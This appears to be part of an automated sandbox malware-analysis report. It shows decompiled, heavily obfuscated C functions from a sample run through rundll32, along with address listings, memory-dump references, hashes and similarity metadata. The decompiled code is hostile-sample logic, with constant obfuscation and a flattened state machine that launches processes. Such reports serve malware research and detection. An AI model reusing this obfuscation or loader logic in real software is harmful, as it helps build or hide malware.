				signed int* _t395;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t407;
				signed int* _t428;
				void* _t429;
				signed short* _t435;
				signed int* _t436;

				_t436 =  &_v1720;
				_v1644 = 0xf4f2e5;
				_v1644 = _v1644 << 6;
				_t397 = 0x4a;
				_v1644 = _v1644 / _t397;
				_v1644 = _v1644 ^ 0x00d3d8d4;
				_t395 = 0;
				_v1660 = 0x8afd01;
				_t429 = 0xc405385;
				_v1660 = _v1660 | 0xf6dee043;
				_v1660 = _v1660 ^ 0x10b315be;
				_t398 = 0x45;
				_v1660 = _v1660 / _t398;
				_v1660 = _v1660 ^ 0x035da190;
				_v1692 = 0xc25321;
				_v1692 = _v1692 | 0x3e4ae4fc;
				_t399 = 0x12;
				_v1692 = _v1692 * 0x47;
				_v1692 = _v1692 ^ 0x6159278c;
				_v1692 = _v1692 ^ 0x0b15fa01;
				_v1572 = 0xf82306;
				_v1572 = _v1572 | 0xe3d21ea1;
				_v1572 = _v1572 ^ 0xe3f9e5ad;
				_v1676 = 0x48d4cb;
				_v1676 = _v1676 << 4;
				_v1676 = _v1676 + 0xffff2f85;
				_v1676 = _v1676 + 0x9649;
				_v1676 = _v1676 ^ 0x048c097a;
				_v1584 = 0x8f76c2;
				_v1584 = _v1584 * 0x1d;
				_v1584 = _v1584 ^ 0x10457475;
				_v1596 = 0xadf885;
				_v1596 = _v1596 ^ 0xa065608b;
				_v1596 = _v1596 ^ 0xa0c2245b;
				_v1684 = 0xeb1e45;
				_v1684 = _v1684 + 0x7cda;
				_v1684 = _v1684 / _t399;
				_v1684 = _v1684 + 0xffffa266;
				_v1684 = _v1684 ^ 0x0000adef;
				_v1632 = 0x65fdd9;
				_v1632 = _v1632 + 0xb49;
				_v1632 = _v1632 + 0xfffffa9d;
				_v1632 = _v1632 ^ 0x00600454;
				_v1716 = 0x9184ac;
				_v1716 = _v1716 + 0xffff0d2e;
				_v1716 = _v1716 | 0x6897691f;
				_v1716 = _v1716 ^ 0x2cb5e262;
				_v1716 = _v1716 ^ 0x442095be;
				_v1576 = 0x53941d;
				_v1576 = _v1576 >> 2;
				_v1576 = _v1576 ^ 0x001525d4;
				_v1640 = 0xd435ce;
				_v1640 = _v1640 + 0xffff1394;
				_v1640 = _v1640 + 0xffff8dc5;
				_v1640 = _v1640 ^ 0x00d594ec;
				_v1708 = 0x173594;
				_v1708 = _v1708 ^ 0xe44a87fe;
				_v1708 = _v1708 << 7;
				_v1708 = _v1708 + 0xee7d;
				_v1708 = _v1708 ^ 0x2ed8d8cc;
				_v1700 = 0x94f2ae;
				_v1700 = _v1700 << 3;
				_v1700 = _v1700 << 6;
				_v1700 = _v1700 * 0x58;
				_v1700 = _v1700 ^ 0x66d58e50;
				_v1604 = 0xd84545;
				_v1604 = _v1604 | 0x98cc5948;
				_v1604 = _v1604 ^ 0x98d8436e;
				_v1668 = 0xea4a2f;
				_v1668 = _v1668 + 0xf7bd;
				_v1668 = _v1668 >> 7;
				_v1668 = _v1668 ^ 0xf693418b;
				_v1668 = _v1668 ^ 0xf6966bd3;
				_v1580 = 0xa2c8e;
				_v1580 = _v1580 + 0x2944;
				_v1580 = _v1580 ^ 0x00011cb1;
				_v1720 = 0x34ce8d;
				_v1720 = _v1720 | 0xf5ffffea;
				_v1720 = _v1720 >> 9;
				_v1720 = _v1720 ^ 0x00732654;
				_v1564 = 0x8a9f58;
				_v1564 = _v1564 + 0x7c05;
				_v1564 = _v1564 ^ 0x008f283e;
				_v1588 = 0xa4f562;
				_v1588 = _v1588 ^ 0x7b7d16a6;
				_v1588 = _v1588 ^ 0x7bd14885;
				_v1704 = 0xee28fd;
				_v1704 = _v1704 + 0xffffe5b2;
				_v1704 = _v1704 + 0xffff824b;
				_v1704 = _v1704 + 0x581e;
				_v1704 = _v1704 ^ 0x00e0f0ab;
				_v1712 = 0x91da58;
				_v1712 = _v1712 << 3;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 ^ 0x485191fe;
				_v1712 = _v1712 ^ 0x920a86f0;
				_v1624 = 0xf1deea;
				_t400 = 3;
				_v1624 = _v1624 / _t400;
				_t401 = 0x38;
				_v1624 = _v1624 * 0x4f;
				_v1624 = _v1624 ^ 0x18ea6ffc;
				_v1680 = 0x898c63;
				_v1680 = _v1680 * 0x6a;
				_v1680 = _v1680 * 0x38;
				_v1680 = _v1680 | 0xa82efbb3;
				_v1680 = _v1680 ^ 0xfd6ff7e4;
				_v1688 = 0xae251e;
				_v1688 = _v1688 << 3;
				_v1688 = _v1688 >> 0xf;
				_v1688 = _v1688 + 0xb719;
				_v1688 = _v1688 ^ 0x000aff47;
				_v1696 = 0x40e656;
				_v1696 = _v1696 | 0x21fda4e6;
				_v1696 = _v1696 + 0xca7;
				_v1696 = _v1696 << 0xa;
				_v1696 = _v1696 ^ 0xf7c0cc6c;
				_v1652 = 0x8f24c5;
				_v1652 = _v1652 << 0xb;
				_v1652 = _v1652 ^ 0x5fc65761;
				_v1652 = _v1652 ^ 0x26eed855;
				_v1600 = 0xeb50f4;
				_v1600 = _v1600 | 0xe5f9ced2;
				_v1600 = _v1600 ^ 0xe5f6f1e5;
				_v1672 = 0x2ac6e7;
				_v1672 = _v1672 / _t401;
				_v1672 = _v1672 + 0xffffde53;
				_v1672 = _v1672 + 0xffff94e0;
				_v1672 = _v1672 ^ 0x000ac548;
				_v1648 = 0x7ee323;
				_v1648 = _v1648 ^ 0xc4404dab;
				_v1648 = _v1648 << 2;
				_v1648 = _v1648 ^ 0x10f162dd;
				_v1568 = 0xe6f77a;
				_v1568 = _v1568 | 0x9ec6220d;
				_v1568 = _v1568 ^ 0x9ee5ede4;
				_v1616 = 0x905f8c;
				_v1616 = _v1616 + 0xffff5c7c;
				_v1616 = _v1616 >> 2;
				_v1616 = _v1616 ^ 0x0024325f;
				_v1592 = 0xde4b6;
				_v1592 = _v1592 * 0x3f;
				_v1592 = _v1592 ^ 0x03679ec9;
				_v1664 = 0xe0cee4;
				_v1664 = _v1664 >> 2;
				_v1664 = _v1664 * 0x13;
				_v1664 = _v1664 * 0x71;
				_v1664 = _v1664 ^ 0xd75e35a6;
				_v1636 = 0x97f252;
				_v1636 = _v1636 | 0xcb237ae2;
				_v1636 = _v1636 << 0xf;
				_v1636 = _v1636 ^ 0xfd7df459;
				_v1656 = 0xc6c2a7;
				_v1656 = _v1656 + 0x66f2;
				_v1656 = _v1656 >> 0x10;
				_v1656 = _v1656 | 0xc8135773;
				_v1656 = _v1656 ^ 0xc81a6fdc;
				_v1608 = 0xd95490;
				_v1608 = _v1608 + 0xffff3702;
				_v1608 = _v1608 ^ 0x00d9a4ac;
				_v1612 = 0x2487c2;
				_t435 = _v1608;
				_v1612 = _v1612 * 0x77;
				_v1612 = _v1612 << 4;
				_v1612 = _v1612 ^ 0x0fb1a599;
				_v1620 = 0xa1030c;
				_v1620 = _v1620 >> 3;
				_v1620 = _v1620 << 0x10;
				_v1620 = _v1620 ^ 0x20685173;
				_v1628 = 0xb9794c;
				_v1628 = _v1628 >> 0xa;
				_v1628 = _v1628 >> 4;
				_v1628 = _v1628 ^ 0x0003794a;
				while(_t429 != 0x35deb36) {
					if(_t429 == 0x3b58d4d) {
						_push(_v1628);
						_push(_v1620);
						_push(_v1612);
						_push(_t395);
						_push(_t395);
						_push(_v1608);
						_push(_t401);
						_push(_t395);
						E002B9700(_t435, _v1656, __eflags);
						_t395 = 1;
						__eflags = 1;
						L23:
						return _t395;
					}
					if(_t429 == 0x7ac99d0) {
						_t381 = _t435;
						__eflags =  *_t435 - _t395;
						if(__eflags == 0) {
							L18:
							_t429 = 0xe3616dc;
							continue;
						} else {
							goto L11;
						}
						do {
							L11:
							__eflags =  *_t381 - 0x2c;
							if( *_t381 != 0x2c) {
								goto L17;
							}
							_t428 =  &_v1560;
							while(1) {
								_t381 =  &(_t381[1]);
								_t407 =  *_t381 & 0x0000ffff;
								__eflags = _t407;
								if(_t407 == 0) {
									break;
								}
								__eflags = _t407 - 0x20;
								if(_t407 == 0x20) {
									break;
								}
								 *_t428 = _t407;
								_t428 =  &(_t428[0]);
								__eflags = _t428;
							}
							_t401 = 0;
							__eflags = 0;
							 *_t428 = 0;
							L17:
							_t381 =  &(_t381[1]);
							__eflags =  *_t381 - _t395;
						} while (__eflags != 0);
						goto L18;
					}
					if(_t429 == 0x94e99a1) {
						_push(_t401);
						E002BEA7B( &_v520, _v1580, _v1644, _t401, _v1720, _v1564, _v1588); // executed
						E002D12A8(_t401, _v1704, __eflags, _v1712, _v1624,  &_v1040);
						_push(_v1652);
						_push(_v1696);
						_push(0x2b11dc);
						E002BE7CE(E002BAB66(_v1680, _v1688, __eflags), __eflags, _v1600,  &_v520, _v1680, _v1672, _v1648, _v1568, _v1616,  &_v1040);
						_t401 = _v1592;
						E002BAE03(_t401, _v1664, _v1636, _t385);
						_t436 =  &(_t436[0x17]);
						_t429 = 0x3b58d4d;
						continue;
					}
					if(_t429 == 0xc405385) {
						_t401 = 0x208;
						E002D1310(0x208,  &_v1560, _v1660, _v1692, _v1572, _v1676);
						_t436 =  &(_t436[4]);
						_t429 = 0x35deb36;
						continue;
					}
					_t445 = _t429 - 0xe3616dc;
					if(_t429 == 0xe3616dc) {
						_push(_v1716);
						_push(_v1632);
						_push(0x2b115c);
						_t393 = E002CFC96(_v1576, _v1640, E002BAB66(_v1596, _v1684, _t445), _v1708,  &_v1560); // executed
						asm("sbb edi, edi");
						_t401 = _v1700;
						_t429 = ( ~_t393 & 0x02043081) + 0x74a6920;
						E002BAE03(_t401, _v1604, _v1668, _t391);
						_t436 =  &(_t436[8]);
					}
					L20:
					if(_t429 != 0x74a6920) {
						continue;
					}
					goto L23;
				}
				_t435 = E002CE35A();
				_t429 = 0x7ac99d0;
				goto L20;
			}



























































                                                                                                                      0x002c5cf9
                                                                                                                      0x002c5cff
                                                                                                                      0x002c5d09
                                                                                                                      0x002c5d18
                                                                                                                      0x002c5d1d
                                                                                                                      0x002c5d23
                                                                                                                      0x002c5d2b
                                                                                                                      0x002c5d2d
                                                                                                                      0x002c5d35
                                                                                                                      0x002c5d3a
                                                                                                                      0x002c5d42
                                                                                                                      0x002c5d4e
                                                                                                                      0x002c5d53
                                                                                                                      0x002c5d59
                                                                                                                      0x002c5d61
                                                                                                                      0x002c5d69
                                                                                                                      0x002c5d76
                                                                                                                      0x002c5d77
                                                                                                                      0x002c5d7b
                                                                                                                      0x002c5d83
                                                                                                                      0x002c5d8b
                                                                                                                      0x002c5d96
                                                                                                                      0x002c5da1
                                                                                                                      0x002c5dac
                                                                                                                      0x002c5db4
                                                                                                                      0x002c5db9
                                                                                                                      0x002c5dc1
                                                                                                                      0x002c5dc9
                                                                                                                      0x002c5dd1
                                                                                                                      0x002c5de4
                                                                                                                      0x002c5deb
                                                                                                                      0x002c5df6
                                                                                                                      0x002c5e01
                                                                                                                      0x002c5e0c
                                                                                                                      0x002c5e17
                                                                                                                      0x002c5e1f
                                                                                                                      0x002c5e2d
                                                                                                                      0x002c5e31
                                                                                                                      0x002c5e39
                                                                                                                      0x002c5e41
                                                                                                                      0x002c5e49
                                                                                                                      0x002c5e51
                                                                                                                      0x002c5e59
                                                                                                                      0x002c5e61
                                                                                                                      0x002c5e69
                                                                                                                      0x002c5e71
                                                                                                                      0x002c5e79
                                                                                                                      0x002c5e81
                                                                                                                      0x002c5e89
                                                                                                                      0x002c5e94
                                                                                                                      0x002c5e9c
                                                                                                                      0x002c5ea7
                                                                                                                      0x002c5eaf
                                                                                                                      0x002c5eb7
                                                                                                                      0x002c5ebf
                                                                                                                      0x002c5ec7
                                                                                                                      0x002c5ecf
                                                                                                                      0x002c5ed7
                                                                                                                      0x002c5edc
                                                                                                                      0x002c5ee4
                                                                                                                      0x002c5eec
                                                                                                                      0x002c5ef4
                                                                                                                      0x002c5ef9
                                                                                                                      0x002c5f03
                                                                                                                      0x002c5f09
                                                                                                                      0x002c5f11
                                                                                                                      0x002c5f1c
                                                                                                                      0x002c5f27
                                                                                                                      0x002c5f32
                                                                                                                      0x002c5f3a
                                                                                                                      0x002c5f42
                                                                                                                      0x002c5f47
                                                                                                                      0x002c5f4f
                                                                                                                      0x002c5f57
                                                                                                                      0x002c5f62
                                                                                                                      0x002c5f6d
                                                                                                                      0x002c5f78
                                                                                                                      0x002c5f80
                                                                                                                      0x002c5f88
                                                                                                                      0x002c5f8d
                                                                                                                      0x002c5f95
                                                                                                                      0x002c5fa0
                                                                                                                      0x002c5fab
                                                                                                                      0x002c5fb6
                                                                                                                      0x002c5fc1
                                                                                                                      0x002c5fcc
                                                                                                                      0x002c5fd7
                                                                                                                      0x002c5fdf
                                                                                                                      0x002c5fe7
                                                                                                                      0x002c5fef
                                                                                                                      0x002c5ff7
                                                                                                                      0x002c5fff
                                                                                                                      0x002c6007
                                                                                                                      0x002c600c
                                                                                                                      0x002c6011
                                                                                                                      0x002c6019
                                                                                                                      0x002c6021
                                                                                                                      0x002c602f
                                                                                                                      0x002c6034
                                                                                                                      0x002c603f
                                                                                                                      0x002c6040
                                                                                                                      0x002c6044
                                                                                                                      0x002c604c
                                                                                                                      0x002c6059
                                                                                                                      0x002c6062
                                                                                                                      0x002c6066
                                                                                                                      0x002c606e
                                                                                                                      0x002c6076
                                                                                                                      0x002c607e
                                                                                                                      0x002c6083
                                                                                                                      0x002c6088
                                                                                                                      0x002c6090
                                                                                                                      0x002c6098
                                                                                                                      0x002c60a0
                                                                                                                      0x002c60a8
                                                                                                                      0x002c60b0
                                                                                                                      0x002c60b5
                                                                                                                      0x002c60bd
                                                                                                                      0x002c60c5
                                                                                                                      0x002c60ca
                                                                                                                      0x002c60d2
                                                                                                                      0x002c60da
                                                                                                                      0x002c60e5
                                                                                                                      0x002c60f0
                                                                                                                      0x002c60fb
                                                                                                                      0x002c6109
                                                                                                                      0x002c610d
                                                                                                                      0x002c6115
                                                                                                                      0x002c611d
                                                                                                                      0x002c6125
                                                                                                                      0x002c612d
                                                                                                                      0x002c6135
                                                                                                                      0x002c613a
                                                                                                                      0x002c6142
                                                                                                                      0x002c614d
                                                                                                                      0x002c6158
                                                                                                                      0x002c6163
                                                                                                                      0x002c616b
                                                                                                                      0x002c6173
                                                                                                                      0x002c6178
                                                                                                                      0x002c6180
                                                                                                                      0x002c6193
                                                                                                                      0x002c619a
                                                                                                                      0x002c61a5
                                                                                                                      0x002c61ad
                                                                                                                      0x002c61b7
                                                                                                                      0x002c61c0
                                                                                                                      0x002c61c4
                                                                                                                      0x002c61cc
                                                                                                                      0x002c61d4
                                                                                                                      0x002c61dc
                                                                                                                      0x002c61e1
                                                                                                                      0x002c61e9
                                                                                                                      0x002c61f1
                                                                                                                      0x002c61f9
                                                                                                                      0x002c61fe
                                                                                                                      0x002c6206
                                                                                                                      0x002c620e
                                                                                                                      0x002c6219
                                                                                                                      0x002c6224
                                                                                                                      0x002c622f
                                                                                                                      0x002c623c
                                                                                                                      0x002c6243
                                                                                                                      0x002c6247
                                                                                                                      0x002c624c
                                                                                                                      0x002c6254
                                                                                                                      0x002c625c
                                                                                                                      0x002c6261
                                                                                                                      0x002c6266
                                                                                                                      0x002c626e
                                                                                                                      0x002c6276
                                                                                                                      0x002c627b
                                                                                                                      0x002c6280
                                                                                                                      0x002c6288
                                                                                                                      0x002c629a
                                                                                                                      0x002c648d
                                                                                                                      0x002c6491
                                                                                                                      0x002c6495
                                                                                                                      0x002c649c
                                                                                                                      0x002c649d
                                                                                                                      0x002c649e
                                                                                                                      0x002c64a9
                                                                                                                      0x002c64aa
                                                                                                                      0x002c64ad
                                                                                                                      0x002c64b7
                                                                                                                      0x002c64b7
                                                                                                                      0x002c64bb
                                                                                                                      0x002c64c4
                                                                                                                      0x002c64c4
                                                                                                                      0x002c62a6
                                                                                                                      0x002c6427
                                                                                                                      0x002c6429
                                                                                                                      0x002c642d
                                                                                                                      0x002c6462
                                                                                                                      0x002c6462
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c642f
                                                                                                                      0x002c642f
                                                                                                                      0x002c642f
                                                                                                                      0x002c6433
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c6435
                                                                                                                      0x002c644a
                                                                                                                      0x002c644a
                                                                                                                      0x002c644d
                                                                                                                      0x002c6450
                                                                                                                      0x002c6453
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c643e
                                                                                                                      0x002c6442
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c6444
                                                                                                                      0x002c6447
                                                                                                                      0x002c6447
                                                                                                                      0x002c6447
                                                                                                                      0x002c6455
                                                                                                                      0x002c6455
                                                                                                                      0x002c6457
                                                                                                                      0x002c645a
                                                                                                                      0x002c645a
                                                                                                                      0x002c645d
                                                                                                                      0x002c645d
                                                                                                                      0x00000000
                                                                                                                      0x002c642f
                                                                                                                      0x002c62b2
                                                                                                                      0x002c6368
                                                                                                                      0x002c638e
                                                                                                                      0x002c63aa
                                                                                                                      0x002c63af
                                                                                                                      0x002c63b3
                                                                                                                      0x002c63bf
                                                                                                                      0x002c63fd
                                                                                                                      0x002c640e
                                                                                                                      0x002c6415
                                                                                                                      0x002c641a
                                                                                                                      0x002c641d
                                                                                                                      0x00000000
                                                                                                                      0x002c641d
                                                                                                                      0x002c62be
                                                                                                                      0x002c6342
                                                                                                                      0x002c6356
                                                                                                                      0x002c635b
                                                                                                                      0x002c635e
                                                                                                                      0x00000000
                                                                                                                      0x002c635e
                                                                                                                      0x002c62c0
                                                                                                                      0x002c62c6
                                                                                                                      0x002c62cc
                                                                                                                      0x002c62d0
                                                                                                                      0x002c62df
                                                                                                                      0x002c6303
                                                                                                                      0x002c6318
                                                                                                                      0x002c631a
                                                                                                                      0x002c6324
                                                                                                                      0x002c632a
                                                                                                                      0x002c632f
                                                                                                                      0x002c632f
                                                                                                                      0x002c647f
                                                                                                                      0x002c6485
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c648b
                                                                                                                      0x002c6478
                                                                                                                      0x002c647a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: #~$/J$D)$T&s$V@$_2$$sQh $}
                                                                                                                      • API String ID: 1514166925-82791160
                                                                                                                      • Opcode ID: b3bb1fb3bd98d4b63a90ff562137d282f7ce1beb1f41915249a49fee41a89dec
                                                                                                                      • Instruction ID: 3cf23ae981ede0175c7f0822225aee1372be92b94d6c59a4bc40357d93d6a8bf
                                                                                                                      • Opcode Fuzzy Hash: b3bb1fb3bd98d4b63a90ff562137d282f7ce1beb1f41915249a49fee41a89dec
                                                                                                                      • Instruction Fuzzy Hash: 1A0213725083819FD3A8CF65C58AA4BBBE1FBC5748F508A1DF1DA86260D7B08959CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002B9700 Relevance: 1.5, Strings: 1, Instructions: 201COMMONCrypto
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 280 2b9700-2b99cc call 2bcf25 call 2d1310 call 2c679c 286 2b99d1-2b99d6 280->286 287 2b99d8-2b99da 286->287 288 2b9a15 286->288 289 2b99e8-2b9a13 call 2c4dad * 2 287->289 290 2b99dc-2b99e2 287->290 291 2b9a17-2b9a1d 288->291 292 2b99e3-2b99e6 289->292 290->292 292->291
                                                                                                                      C-Code - Quality: 65%
                                                                                                                      			E002B9700(WCHAR* __ecx, void* __edx, void* __eflags) {
				void* _t207;
				void* _t231;
				void* _t232;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				void* _t243;
				intOrPtr _t265;
				WCHAR* _t268;
				void* _t271;
				void* _t272;

				_t271 = _t272 - 0x58;
				_push( *((intOrPtr*)(_t271 + 0x7c)));
				_t265 =  *((intOrPtr*)(_t271 + 0x6c));
				_t268 = __ecx;
				_push( *((intOrPtr*)(_t271 + 0x78)));
				_push( *((intOrPtr*)(_t271 + 0x74)));
				_push( *((intOrPtr*)(_t271 + 0x70)));
				_push(_t265);
				_push( *((intOrPtr*)(_t271 + 0x68)));
				_push(0);
				_push( *((intOrPtr*)(_t271 + 0x60)));
				_push(__edx);
				_push(__ecx);
				E002BCF25(_t207);
				 *(_t271 + 0x40) = 0x9c1626;
				 *(_t271 + 0x40) =  *(_t271 + 0x40) << 8;
				 *(_t271 + 0x40) =  *(_t271 + 0x40) << 4;
				 *(_t271 + 0x40) =  *(_t271 + 0x40) + 0xfbea;
				 *(_t271 + 0x40) =  *(_t271 + 0x40) ^ 0xc166ab3f;
				 *(_t271 + 0x50) = 0x2d866;
				 *(_t271 + 0x50) =  *(_t271 + 0x50) + 0xffff915f;
				 *(_t271 + 0x50) =  *(_t271 + 0x50) + 0x9947;
				 *(_t271 + 0x50) =  *(_t271 + 0x50) << 8;
				 *(_t271 + 0x50) =  *(_t271 + 0x50) ^ 0x03009f0e;
				 *(_t271 + 0x1c) = 0xb11a6d;
				_t237 = 0x61;
				 *(_t271 + 0x1c) =  *(_t271 + 0x1c) * 0x53;
				 *(_t271 + 0x1c) =  *(_t271 + 0x1c) | 0x3495d398;
				 *(_t271 + 0x1c) =  *(_t271 + 0x1c) ^ 0x3dfc3820;
				 *(_t271 + 0x28) = 0x82663;
				 *(_t271 + 0x28) =  *(_t271 + 0x28) * 0x55;
				 *(_t271 + 0x28) =  *(_t271 + 0x28) / _t237;
				 *(_t271 + 0x28) =  *(_t271 + 0x28) ^ 0x000fae18;
				 *(_t271 + 0xc) = 0xaf113;
				 *(_t271 + 0xc) =  *(_t271 + 0xc) | 0x96b3e95f;
				 *(_t271 + 0xc) =  *(_t271 + 0xc) ^ 0x96be4803;
				 *(_t271 + 0x30) = 0x440ee2;
				 *(_t271 + 0x30) =  *(_t271 + 0x30) << 2;
				_t238 = 0x3a;
				 *(_t271 + 0x30) =  *(_t271 + 0x30) * 0x27;
				 *(_t271 + 0x30) =  *(_t271 + 0x30) ^ 0x297e7faa;
				 *(_t271 + 8) = 0x67057e;
				 *(_t271 + 8) =  *(_t271 + 8) ^ 0xa7e99d1b;
				 *(_t271 + 8) =  *(_t271 + 8) ^ 0xa7839d84;
				 *(_t271 + 0x38) = 0x1c9970;
				 *(_t271 + 0x38) =  *(_t271 + 0x38) * 0x7c;
				 *(_t271 + 0x38) =  *(_t271 + 0x38) + 0xffff63ab;
				 *(_t271 + 0x38) =  *(_t271 + 0x38) ^ 0x0ddf815b;
				 *(_t271 + 0x54) = 0x9de9b7;
				 *(_t271 + 0x54) =  *(_t271 + 0x54) / _t238;
				 *(_t271 + 0x54) =  *(_t271 + 0x54) | 0x8a1e8ac2;
				 *(_t271 + 0x54) =  *(_t271 + 0x54) + 0x89e3;
				 *(_t271 + 0x54) =  *(_t271 + 0x54) ^ 0x8a1a691c;
				 *(_t271 + 0x48) = 0xcb1eea;
				 *(_t271 + 0x48) =  *(_t271 + 0x48) + 0xac00;
				 *(_t271 + 0x48) =  *(_t271 + 0x48) ^ 0x8f71cfce;
				 *(_t271 + 0x48) =  *(_t271 + 0x48) ^ 0xa15123d8;
				 *(_t271 + 0x48) =  *(_t271 + 0x48) ^ 0x2ee8c557;
				 *(_t271 + 0x20) = 0xb0d713;
				 *(_t271 + 0x20) =  *(_t271 + 0x20) + 0xc72b;
				 *(_t271 + 0x20) =  *(_t271 + 0x20) >> 4;
				 *(_t271 + 0x20) =  *(_t271 + 0x20) ^ 0x0005ac28;
				 *(_t271 + 0x18) = 0xfc2615;
				 *(_t271 + 0x18) =  *(_t271 + 0x18) ^ 0x29594ddd;
				 *(_t271 + 0x18) =  *(_t271 + 0x18) ^ 0x29a8e047;
				 *(_t271 + 0x4c) = 0x55d93;
				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) ^ 0x83f0b4dd;
				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) * 0x1f;
				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) >> 6;
				 *(_t271 + 0x4c) =  *(_t271 + 0x4c) ^ 0x03ebee2a;
				 *(_t271 + 0x24) = 0xa7d31;
				_t239 = 0x67;
				 *(_t271 + 0x24) =  *(_t271 + 0x24) / _t239;
				_t240 = 0x64;
				 *(_t271 + 0x24) =  *(_t271 + 0x24) * 0x77;
				 *(_t271 + 0x24) =  *(_t271 + 0x24) ^ 0x000a2b61;
				 *(_t271 + 0x14) = 0x947781;
				_t241 = 0x11;
				 *(_t271 + 0x14) =  *(_t271 + 0x14) / _t240;
				 *(_t271 + 0x14) =  *(_t271 + 0x14) ^ 0x0008efbc;
				 *(_t271 + 0x2c) = 0x75c872;
				 *(_t271 + 0x2c) =  *(_t271 + 0x2c) / _t241;
				_t242 = 0x74;
				 *(_t271 + 0x2c) =  *(_t271 + 0x2c) * 0x27;
				 *(_t271 + 0x2c) =  *(_t271 + 0x2c) ^ 0x010d2973;
				 *(_t271 + 0x10) = 0x81f543;
				_t149 = _t271 - 0x4c; // 0x10f16291
				 *(_t271 + 0x10) =  *(_t271 + 0x10) / _t242;
				 *(_t271 + 0x10) =  *(_t271 + 0x10) ^ 0x0000d691;
				 *(_t271 + 0x3c) = 0x7405f8;
				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) ^ 0xe39458d4;
				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) ^ 0xc0d1562e;
				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) + 0xffff0384;
				 *(_t271 + 0x3c) =  *(_t271 + 0x3c) ^ 0x233c26a4;
				 *(_t271 + 0x34) = 0x5a2607;
				 *(_t271 + 0x34) =  *(_t271 + 0x34) | 0x05401af1;
				 *(_t271 + 0x34) =  *(_t271 + 0x34) ^ 0xbbb735af;
				 *(_t271 + 0x34) =  *(_t271 + 0x34) ^ 0xbee5cf81;
				 *(_t271 + 0x44) = 0xea1272;
				 *(_t271 + 0x44) =  *(_t271 + 0x44) + 0xffff82c7;
				 *(_t271 + 0x44) =  *(_t271 + 0x44) | 0x60f8fd5f;
				 *(_t271 + 0x44) =  *(_t271 + 0x44) + 0xdb64;
				 *(_t271 + 0x44) =  *(_t271 + 0x44) ^ 0x60f501b5;
				_push( *(_t271 + 0x28));
				_push( *(_t271 + 0x1c));
				_push( *(_t271 + 0x50));
				_push( *(_t271 + 0x40));
				_t243 = 0x44;
				E002D1310(_t243, _t149);
				 *((intOrPtr*)(_t271 - 0x4c)) = 0x44;
				_t183 = _t271 - 0x4c; // 0x10f16291
				_t189 = _t271 - 8; // 0x10f162d5
				_t231 = E002C679C(_t268,  *(_t271 + 0xc), _t189,  *(_t271 + 0x30), _t243,  *(_t271 + 8),  *(_t271 + 0x38),  *(_t271 + 0x54),  *(_t271 + 0x48), _t243, _t183,  *(_t271 + 0x20), _t243,  *(_t271 + 0x18), _t243, _t243,  *((intOrPtr*)(_t271 + 0x70)),  *((intOrPtr*)(_t271 + 0x60))); // executed
				if(_t231 == 0) {
					_t232 = 0;
				} else {
					if(_t265 == 0) {
						E002C4DAD( *(_t271 + 0x4c),  *(_t271 + 0x24),  *((intOrPtr*)(_t271 - 8)),  *(_t271 + 0x14),  *(_t271 + 0x2c));
						E002C4DAD( *(_t271 + 0x10),  *(_t271 + 0x3c),  *((intOrPtr*)(_t271 - 4)),  *(_t271 + 0x34),  *(_t271 + 0x44));
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
					}
					_t232 = 1;
				}
				return _t232;
			}

















                                                                                                                      0x002b9701
                                                                                                                      0x002b970d
                                                                                                                      0x002b9710
                                                                                                                      0x002b9713
                                                                                                                      0x002b9715
                                                                                                                      0x002b9718
                                                                                                                      0x002b971b
                                                                                                                      0x002b971e
                                                                                                                      0x002b971f
                                                                                                                      0x002b9722
                                                                                                                      0x002b9724
                                                                                                                      0x002b9727
                                                                                                                      0x002b9728
                                                                                                                      0x002b9729
                                                                                                                      0x002b972e
                                                                                                                      0x002b9737
                                                                                                                      0x002b973b
                                                                                                                      0x002b973f
                                                                                                                      0x002b9746
                                                                                                                      0x002b974d
                                                                                                                      0x002b9754
                                                                                                                      0x002b975b
                                                                                                                      0x002b9762
                                                                                                                      0x002b9766
                                                                                                                      0x002b976d
                                                                                                                      0x002b977a
                                                                                                                      0x002b977d
                                                                                                                      0x002b9780
                                                                                                                      0x002b9787
                                                                                                                      0x002b978e
                                                                                                                      0x002b9799
                                                                                                                      0x002b97a3
                                                                                                                      0x002b97a6
                                                                                                                      0x002b97ad
                                                                                                                      0x002b97b4
                                                                                                                      0x002b97bb
                                                                                                                      0x002b97c2
                                                                                                                      0x002b97c9
                                                                                                                      0x002b97d1
                                                                                                                      0x002b97d2
                                                                                                                      0x002b97d5
                                                                                                                      0x002b97dc
                                                                                                                      0x002b97e3
                                                                                                                      0x002b97ea
                                                                                                                      0x002b97f1
                                                                                                                      0x002b97fc
                                                                                                                      0x002b97ff
